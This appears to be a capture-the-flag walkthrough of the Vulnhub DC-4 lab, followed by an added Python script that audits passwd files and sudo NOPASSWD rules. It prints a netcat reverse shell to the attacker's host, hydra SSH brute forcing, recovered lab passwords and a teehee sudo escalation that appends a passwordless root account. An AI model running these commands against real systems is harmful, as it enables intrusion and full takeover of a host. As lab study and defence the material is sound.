Vulnhub-DC4
vulnhub DC-4
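nmap shows that ports 22 and 80 are open. The web side has only a login page and no CMS, so brute forcing is the option to consider.
Brute forcing with Burp Suite gives the password happy. The admin panel has a command-execution feature, so intercept the request.
Modifying the command shows that it runs with www-data privileges. Try a reverse shell; start a listener on Kali: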
nc -lnvp 4444
nc+-e+/bin/sh+192.168.1.9+4444 (+ stands for a space)
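Upgrade to an interactive shell:
python -c 'import pty;pty.spawn("/bin/sh")'
The home directory contains three users. Under the jim user there is a backup file of a password wordlist, so try brute forcing with it:
hydra -l jim -P pass.txt ssh://192.168.1.2
This gives the password jibril04.
The /var/mail directory contains mail, which reveals Charles's password ^xHhA&hvim0y. Switch to Charles and look around; there is nothing there, so try privilege escalation, which turns up (root) NOPASSWD: /usr/bin/teehee
Privilege escalation through teehee seems fairly niche. It is a Linux editor, and the idea is that, given sudo rights on it, you append a new superuser (uid 0) to the passwd file.
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
(-a means append.) With that, privilege escalation succeeds and the flag is obtained.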
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
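From the defender's side, the entry appended above and the sudo rule that allowed it are both easy to detect. The following is an added example, not part of the original write-up: audit_passwd and nopasswd_rules are hypothetical helper names, and SAMPLE_PASSWD is constructed apart from the admin line taken from the page.

```python
import re

# Constructed sample; only the last line is the entry from the write-up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
admin::0:0:::/bin/bash
"""

def audit_passwd(text):
    """Return (line_number, account, finding) for risky passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if not uid.isdigit():
            findings.append((lineno, name, "non-numeric UID"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
        if passwd == "":
            findings.append((lineno, name, "empty password field"))
        elif passwd not in ("x", "*", "!"):
            findings.append((lineno, name, "password hash stored in passwd"))
    return findings

def nopasswd_rules(sudo_l_output):
    """Extract (run_as, [commands]) for every NOPASSWD rule in `sudo -l` output."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = re.search(r"\(([^)]+)\)\s+NOPASSWD:\s*(.+)", line)
        if m:
            rules.append((m.group(1), [c.strip() for c in m.group(2).split(",")]))
    return rules

if __name__ == "__main__":
    for lineno, name, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {finding}")
    print(nopasswd_rules("    (root) NOPASSWD: /usr/bin/teehee"))
```

Any NOPASSWD rule for a binary that can write arbitrary files as root should be reviewed, since it allows exactly the passwd modification shown here.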
Hardship and adversity temper one into success.
